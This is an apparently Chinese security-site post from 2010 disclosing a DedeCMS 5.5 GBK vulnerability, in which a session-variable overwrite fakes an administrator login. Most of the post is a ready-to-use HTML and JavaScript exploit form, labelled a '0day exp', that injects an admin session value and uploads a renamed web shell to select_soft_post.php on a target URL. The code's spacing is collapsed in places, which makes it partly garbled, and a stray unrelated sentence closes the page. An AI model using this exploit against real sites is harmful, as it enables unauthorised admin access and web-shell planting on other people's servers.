发布日期:2010-02-28
影响版本:dedecms (织梦)5.5 GBK
漏洞描述:
在session.auto_start开启的情况下可以任意覆盖$_SESSION变量,我们可以伪造管理员登录并上传文件
/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php
上传时重命名为 *.php.即可绕过检查上传shell
exp:
<formaction=""method='POST'enctype="multipart/form-data">U R L:<inputtype="text"name="target"size="50"value="http://192.168.1.110"> Path:<inputtype="text"name="path"value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php"size="90"><br>File: <inputtype='file'name='uploadfile'size='25'/>(FiletypemustbeGIF/JPEGetc) RenameT<inputtype='test'name='newname'value="shell.asp."/><br> <inputtype=hiddenname="_SESSION[dede_admin_id]"value=1><inputtype=hiddenname="bkurl"value=1><inputtype='button'value='submit'onclick="fsubmit()"/><br><br><br><br><br><br>dedecms0dayexp..<br>need:session.auto_start=1<br>Bytoby572010/2/22 </form><script>functionfsubmit(){ varform=document.forms[0]; formform.action=form.target.value+form.path.value; tmpstr=form.target.value+'/'+form.newname.value; form.bkurl.value=tmpstr.substr(0,tmpstr.length-1); form.submit(); } </script>
注:在linux系统下shell.php.无法正常运行。
标签分类: 安全漏洞
你会发现,曾经以为很难做到的事情,